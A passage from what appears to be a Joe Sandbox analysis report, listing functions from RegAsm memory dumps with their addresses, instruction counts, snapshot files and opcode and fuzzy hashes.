                                    • Instruction Fuzzy Hash: 03C1D274E00218CFDB54EFA5C984B9DBBB2BF89304F1084A9D819AB365DB359E85CF50
                                    Function 06144320 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d38fda8d5fbd97efb7ebbb18c581b3a649d364c8d41eb8e5faf6920997077300
                                    • Instruction ID: 1abf74b298f58841f09104ff901da7d64765938d9f301b94aa1b4a7767d74a61
                                    • Opcode Fuzzy Hash: d38fda8d5fbd97efb7ebbb18c581b3a649d364c8d41eb8e5faf6920997077300
                                    • Instruction Fuzzy Hash: D9C1CF74E00218CFDB54EFA5D984BADBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Function 06149150 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0191b8a83723f1bb7e9ee5c0dece16910ab456bb59f6d701ebcdc743b99081d3
                                    • Instruction ID: 59261c504804ea8b4093d5aca511633bfae4fbeb91ba367043935137573bd007
                                    • Opcode Fuzzy Hash: 0191b8a83723f1bb7e9ee5c0dece16910ab456bb59f6d701ebcdc743b99081d3
                                    • Instruction Fuzzy Hash: EAC1D374E00218CFDB54EFA5D984B9DBBB2BF89300F2084A9D809AB355DB359E85CF50
                                    Function 06147740 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8872cfd31732ed13e90ab19b3e221fdc32e00d8ca57a654e44541de82a866f9
                                    • Instruction ID: 18c87f929bf6b5298933a0e05bcdfbcf0f6a45e61bbbd1c6171dc3df3291d5c4
                                    • Opcode Fuzzy Hash: f8872cfd31732ed13e90ab19b3e221fdc32e00d8ca57a654e44541de82a866f9
                                    • Instruction Fuzzy Hash: 79C1C274E00218CFDB54EFA5C994B9DBBB2BF89300F1084A9D809AB395DB355E85CF50
                                    Function 06144778 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1974240ba4180cc1c7ef011a1b60ce2b35e15a58112bba71c3dc5a5b179761d0
                                    • Instruction ID: 80457998a5cb5d834fad888eb9c669cfe870c8800c4ced5019a3dd7cdc6a0d38
                                    • Opcode Fuzzy Hash: 1974240ba4180cc1c7ef011a1b60ce2b35e15a58112bba71c3dc5a5b179761d0
                                    • Instruction Fuzzy Hash: 4BC1B074E00218CFDB54EFA5C984B9DBBB2BF89300F1085A9D819AB355DB355E85CF50
                                    Function 06147B98 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0792d9b9560077800d8d140f603e2d5a0da5b35cb6f0db85113993361dccf586
                                    • Instruction ID: d6f047143137a0fba28c3a5ccd51abcc028c70966d615e54a2797eaeb63e8d6a
                                    • Opcode Fuzzy Hash: 0792d9b9560077800d8d140f603e2d5a0da5b35cb6f0db85113993361dccf586
                                    • Instruction Fuzzy Hash: 81C1D374E00218CFDB54EFA5C984BADBBB2BF89300F1085A9D819AB355DB355E85CF50
                                    Function 06146188 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2af416f09c5405acf84520ff6c313c871d076777eea3a28b7c0c3c1a850e57a6
                                    • Instruction ID: 9d8df09df1954019046e3bb5bb0765cbafbd1d1f4e36067085de6b0ba9fb9e2f
                                    • Opcode Fuzzy Hash: 2af416f09c5405acf84520ff6c313c871d076777eea3a28b7c0c3c1a850e57a6
                                    • Instruction Fuzzy Hash: 79C1D274E00218CFDB54EFA5C984BADBBB2BF89304F1084A9D809AB355DB359E85CF50
                                    Function 06144BD0 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6eac4cdc05ba151f05ab20c171de5a3807affae62b92a0d87a006966768a2d16
                                    • Instruction ID: c656a76a46381a47bc32afab05c143ded337411f0b9df95806531ec8cd20d1fc
                                    • Opcode Fuzzy Hash: 6eac4cdc05ba151f05ab20c171de5a3807affae62b92a0d87a006966768a2d16
                                    • Instruction Fuzzy Hash: 77C1B074E00218CFDB54EFA5C984BADBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Function 06147FF0 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4842ab475a1d9a9aa3087ced6aed56e49740604113757649b59e824ef105af9d
                                    • Instruction ID: 671f7e8023aa21cea889140d63875e3932c32fcb2cdda761a4335e100821f7e6
                                    • Opcode Fuzzy Hash: 4842ab475a1d9a9aa3087ced6aed56e49740604113757649b59e824ef105af9d
                                    • Instruction Fuzzy Hash: 2CC1D274E00218CFDB54EFA5D994BADBBB2BF89300F1080A9D809AB355DB359E85CF50
                                    Function 061465E0 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1188c216646a6c53ca54b93451568bd8a37f6b9684e9c06cc58b4633936ce011
                                    • Instruction ID: afd98b673b9195f0eceac137c25215fb41cbd1d0af4eda73bfe64285430c6dbd
                                    • Opcode Fuzzy Hash: 1188c216646a6c53ca54b93451568bd8a37f6b9684e9c06cc58b4633936ce011
                                    • Instruction Fuzzy Hash: EAC1D274E00218CFDB54EFA5D984B9DBBB2BF89304F1084A9D809AB365DB359E85CF50
                                    Function 00F68430 Relevance: .2, Instructions: 220COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c03572b6128da3225ed8230fb3e0658503717dde6ca8959cc89cf2a07271a917
                                    • Instruction ID: 7d5731740663fec6a1ecd132b2f8eb253cff8c588231bcbfc5367a7e2b7c470b
                                    • Opcode Fuzzy Hash: c03572b6128da3225ed8230fb3e0658503717dde6ca8959cc89cf2a07271a917
                                    • Instruction Fuzzy Hash: 0DA10470D00218CFDB14DFA8C984BDDBBB1FF88314F24826AE409AB2A1DB749985CF51
                                    Function 00F68429 Relevance: .2, Instructions: 219COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a207074634f21d65b0c2f5795d1be3625421786c4fd885126e3df501bdde99e3
                                    • Instruction ID: ecc24d51e0cedccf051591a35397179d1358aac1d78d54f0abbbc6b05bd220f8
                                    • Opcode Fuzzy Hash: a207074634f21d65b0c2f5795d1be3625421786c4fd885126e3df501bdde99e3
                                    • Instruction Fuzzy Hash: E6A10470D00218CFDB14DFA9C984BDDBBB1FF88314F24966AE409AB2A1DB749985CF51
                                    Function 00F68776 Relevance: .2, Instructions: 202COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 058575d40a0493e3bbaf60f7562a276f51a0fc2b1a3585502cdcd04b82b597f4
                                    • Instruction ID: 630cfc67b463370ca33d8e37bc8e93cca07417777b95213389a61a32e163c2a7
                                    • Opcode Fuzzy Hash: 058575d40a0493e3bbaf60f7562a276f51a0fc2b1a3585502cdcd04b82b597f4
                                    • Instruction Fuzzy Hash: 7091F270D00218CFDB10DFA8C888BDDBBB1FF49310F24966AE409AB292DB759985DF55
                                    Function 0614ED68 Relevance: .2, Instructions: 196COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 572ccdc427d1ac95ba1c3e348d36cbd3eec0c1631f66696152be280f36e654f4
                                    • Instruction ID: bf5f820502c9b32c1a63497f4cad6a56a41e7bc073bc0c9709566f6502186504
                                    • Opcode Fuzzy Hash: 572ccdc427d1ac95ba1c3e348d36cbd3eec0c1631f66696152be280f36e654f4
                                    • Instruction Fuzzy Hash: 1A810574E012088FDB54EFAAD9906DDBBF2BF88310F64C529E414AB399DB359942CF50
                                    Function 0614F8C9 Relevance: .1, Instructions: 119COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5862956b1ca22faa7c9b728c95b94c687dc6d07b90c260d3e8ac76b9f9420b13
                                    • Instruction ID: 618246609d73786e6c0ed53f4dcc88388c8b349958b8386921d3220e7136d6fd
                                    • Opcode Fuzzy Hash: 5862956b1ca22faa7c9b728c95b94c687dc6d07b90c260d3e8ac76b9f9420b13
                                    • Instruction Fuzzy Hash: E241F670D01208CFDB58EFAAD95469EBBB2BFC8300F20C56AD418AB355DB345946DF50
                                    Function 0614F013 Relevance: .1, Instructions: 109COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50418ea02713fddb838a0dc7d59d6bb9a0488f30c86dbefc42b94831eada0208
                                    • Instruction ID: 2e11a69b1862de630cdec625da038c7228f7cda5a37840025d1e4a4cc9ef7e8c
                                    • Opcode Fuzzy Hash: 50418ea02713fddb838a0dc7d59d6bb9a0488f30c86dbefc42b94831eada0208
                                    • Instruction Fuzzy Hash: 59411670E012488FDB58DFB6D94469EFBB2AFC9304F24C16AD418AB395DB385946CF50
                                    Function 0614E840 Relevance: .1, Instructions: 105COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43e74f288b198fa02f316c90588093135bfe7829c205ca7865ffc639e8ddb4c1
                                    • Instruction ID: 95762d74f2bf8168d4bc0850f3e6656c327bd707e2ea4b5e6473cbe265f2ce4d
                                    • Opcode Fuzzy Hash: 43e74f288b198fa02f316c90588093135bfe7829c205ca7865ffc639e8ddb4c1
                                    • Instruction Fuzzy Hash: 3141E270E012489FDB58DFBAC84469EFBF2BF89300F24C12AD418AB2A5DB355946CF40
                                    Function 0614F470 Relevance: .1, Instructions: 105COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4d147b9adf3185dcc3f2415c849442651a8f5ec619f23ac76d3b8ff6abcbd35
                                    • Instruction ID: 18cdd89250b38f21f07f7f184cfbd15a036dcf341b6ea9bb8270b879db20b6bf
                                    • Opcode Fuzzy Hash: a4d147b9adf3185dcc3f2415c849442651a8f5ec619f23ac76d3b8ff6abcbd35
                                    • Instruction Fuzzy Hash: C741E374E012488FDB58DFAAD9446DEBBF2AF89300F24C12AD418AB365DB355946CF50
                                    Function 06143A60 Relevance: .1, Instructions: 101COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b81bd726900d7d5eb7497552efbdbd121a056861acfff8a051d88e78e747173
                                    • Instruction ID: 1e8b105bbcf62a09790b7fd427ea865fc59bcb3ba1bb60a0981f90389c310b05
                                    • Opcode Fuzzy Hash: 2b81bd726900d7d5eb7497552efbdbd121a056861acfff8a051d88e78e747173
                                    • Instruction Fuzzy Hash: 7141C570E01208CBEB58DFAAD94469EFBF2AF88300F24C12AD419BB255DB355946CF50
                                    Function 06146E80 Relevance: .1, Instructions: 100COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5be386812b332360355d7437b2397adab82b1e3ef9613fb0abc553bcfd2e7894
                                    • Instruction ID: 27fcb158d3f7f5e1811c5d9f51e7b0a33572f92a723e0e47461a47aa8cd6e809
                                    • Opcode Fuzzy Hash: 5be386812b332360355d7437b2397adab82b1e3ef9613fb0abc553bcfd2e7894
                                    • Instruction Fuzzy Hash: 7641D670D012088BEB58DFAAD9507DEFBF2AF89304F64C12AD418AB255EB355946CF50
                                    Function 061472D8 Relevance: .1, Instructions: 100COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9c5b8a43a9c94017ff3e3bfe7fd4f062796ee9d592ce2c642ec8a30fad8e1a66
                                    • Instruction ID: 32f8d5f1dc169564b373eba8de24e11f7d75a918c31702980eef20bf3f292439
                                    • Opcode Fuzzy Hash: 9c5b8a43a9c94017ff3e3bfe7fd4f062796ee9d592ce2c642ec8a30fad8e1a66
                                    • Instruction Fuzzy Hash: 9E41E5B0D01248CBDB58DFAAD85479EFBB2AF88300F64C12AD418BB255DB345946CF50
                                    Function 061458C8 Relevance: .1, Instructions: 100COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 64844e0a8b3c00b7cbd05112fa83831fc1a5e3bc9dff2e5ea3e67d8fbdac4f28
                                    • Instruction ID: 913f518906907e2a9a34ef2e33157dcfef4740e1cb0bd1be110b89b27c5926e9
                                    • Opcode Fuzzy Hash: 64844e0a8b3c00b7cbd05112fa83831fc1a5e3bc9dff2e5ea3e67d8fbdac4f28
                                    • Instruction Fuzzy Hash: EE41E5B0E002488BEB58DFAAD9547DEFBF3AF88304F20C12AD418AB255DB355946CF50
                                    Function 06147B88 Relevance: .1, Instructions: 100COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8da4259963e6aa6126138ceff89f47d8843f26f78238b5a7cf06de494b7da4ea
                                    • Instruction ID: daa1c5dda810d885d4dcc3633a07226969d5c2685975e3249c64042cf4899899
                                    • Opcode Fuzzy Hash: 8da4259963e6aa6126138ceff89f47d8843f26f78238b5a7cf06de494b7da4ea
                                    • Instruction Fuzzy Hash: 3241C571D012088FEB58DFAAD95479EFBF2AF88304F24C12AD418BB295DB355946CF50
                                    Function 061465D4 Relevance: .1, Instructions: 100COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8af37897185ef870af574086bcbcef01aecaad6ee197c168193dbd3b17267bd4
                                    • Instruction ID: 7ea7a1d5591a1ef88212d5d99c5ef32be45a2d8c0b5469782a3a81bd142db353
                                    • Opcode Fuzzy Hash: 8af37897185ef870af574086bcbcef01aecaad6ee197c168193dbd3b17267bd4
                                    • Instruction Fuzzy Hash: 0E41E5B0E012488FEB58DFAAD9506DEFBF2AF89304F20C12AD418AB255DB355946CF50
                                    Function 06148438 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bffa3c578b4cb0210bad0ca0908f44cc77b75ffe8abe30d67b39da70032b524c
                                    • Instruction ID: 33e8c29435258ddca2917245b03c643813d64915ea4134e16ea6b87d85fcd660
                                    • Opcode Fuzzy Hash: bffa3c578b4cb0210bad0ca0908f44cc77b75ffe8abe30d67b39da70032b524c
                                    • Instruction Fuzzy Hash: 8C41D571E01208CFDB58DFAAD9446DEBBF2AF88304F24C12AD418BB255EB345946CF50
                                    Function 06146A29 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c57d3f8c7f3e8b3be7330f399f79589da873f07e0bfc8a33e5d8ae44ea1c138d
                                    • Instruction ID: 2d16005d6006152fb66e81ec68f9bc3b2f4806f58014c5f02929fa81be0fc158
                                    • Opcode Fuzzy Hash: c57d3f8c7f3e8b3be7330f399f79589da873f07e0bfc8a33e5d8ae44ea1c138d
                                    • Instruction Fuzzy Hash: 4941E570E01208CFEB58DFAAD95069EFBF2AF89304F20C12AD418BB255DB345946CF40
                                    Function 06145470 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bac55b2695360fbce58441badf306dfb6b6852c4ace3b350bd84d4df8314c048
                                    • Instruction ID: 8b5eeeda8c4d1925ff0bd17bb06a2c7f83abb1a7fc5720ecc5983cd509ba6c5c
                                    • Opcode Fuzzy Hash: bac55b2695360fbce58441badf306dfb6b6852c4ace3b350bd84d4df8314c048
                                    • Instruction Fuzzy Hash: 1541E570E01248CBEB58DFAAD85479EFBF2AF88304F24C12AD418BB255DB345946CF50
                                    Function 06144310 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48da1706a1286c78818acd6b139654c94ec9b77706a570caf817bb03a54a60ca
                                    • Instruction ID: 2c3ce7c18656eddb3cdfa657aedf0820937f160a3847e607cd1d167030144480
                                    • Opcode Fuzzy Hash: 48da1706a1286c78818acd6b139654c94ec9b77706a570caf817bb03a54a60ca
                                    • Instruction Fuzzy Hash: 8441C275E01208CBEB58DFAAD94479EBBF2AF89300F24C12AD418AB255EB345946CF50
                                    Function 06144768 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 700e795c929c68982032cd6e0223809bc7984b18a81561b9fcb973b32ab39ec9
                                    • Instruction ID: ae4bde1b5a013ecd25f146b96e5da37897bece9d76025caa0e882ca4e42b924a
                                    • Opcode Fuzzy Hash: 700e795c929c68982032cd6e0223809bc7984b18a81561b9fcb973b32ab39ec9
                                    • Instruction Fuzzy Hash: 0041D370E012488BEB58DFAAD8547DEBBF2AF88304F24C12AD418BB255DB345946CF54
                                    Function 06145018 Relevance: .1, Instructions: 98COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e7b05feff947f222401ef71e2b24bd1f25f0fb99082bb375981093bd2957129
                                    • Instruction ID: 1316205d2413d98e93e781c039d64ab7b79a77de787b8ec2194cc2c6ab0dacca
                                    • Opcode Fuzzy Hash: 6e7b05feff947f222401ef71e2b24bd1f25f0fb99082bb375981093bd2957129
                                    • Instruction Fuzzy Hash: D9410570E002088BEB58DFAAD8546DEFBF3AF88304F24D12AD418BB255EB345946CF54
                                    Function 06143EB9 Relevance: .1, Instructions: 98COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3d42ef77e5ff5a5987ee9dbd74d8a40f8d986cadf9a2808844eab59b52b9e1f7
                                    • Instruction ID: 8d07963a5fd816c55bf628f7a29b253fde969ea37de7f8577232ef148489964f
                                    • Opcode Fuzzy Hash: 3d42ef77e5ff5a5987ee9dbd74d8a40f8d986cadf9a2808844eab59b52b9e1f7
                                    • Instruction Fuzzy Hash: D141D470E012488BDB58DFBAD9546DDFBF2AF88304F24C12AD418AB299DB355946CF50
                                    Function 06147733 Relevance: .1, Instructions: 98COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bba67908bf96b4a8011e7b29e209734c45467ecbd16a30e05b31a98db16d3114
                                    • Instruction ID: 9db6d6cff214b98fba4454b0ec27060f55333ff6480031d7868b86b357d14c22
                                    • Opcode Fuzzy Hash: bba67908bf96b4a8011e7b29e209734c45467ecbd16a30e05b31a98db16d3114
                                    • Instruction Fuzzy Hash: D341D671D012088BEB58DFAAD9446DDFBF2AF88300F64D12AD418BB295DB345946CF54
                                    Function 0614617B Relevance: .1, Instructions: 98COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9c648512b35619f234f58ccff731afab937c1894c00961f4b045021bf23b4f66
                                    • Instruction ID: e174247a1c9fd9785a846d4621968f55c39bfe27337516b33b3ec2aa2be33e86
                                    • Opcode Fuzzy Hash: 9c648512b35619f234f58ccff731afab937c1894c00961f4b045021bf23b4f66
                                    • Instruction Fuzzy Hash: E041C270E01208CBEB58DFAAD95469EFBF2AF89304F24C12AD418AB259DB345946CF50
                                    Function 06147FE3 Relevance: .1, Instructions: 98COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 303387308a68414bc86377dc85993f6e7d96bd518d446635d6b7847cf3682aff
                                    • Instruction ID: 075c353129a3c566e9ef0f081d58b3008a37dd9601828f11d86bb8a0232e1166
                                    • Opcode Fuzzy Hash: 303387308a68414bc86377dc85993f6e7d96bd518d446635d6b7847cf3682aff
                                    • Instruction Fuzzy Hash: F241E4B0E012488FDB58DFAAD85479EBBB2AF88300F24C12AD418AB255DB349946CF40
                                    Function 06148CE9 Relevance: .1, Instructions: 97COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
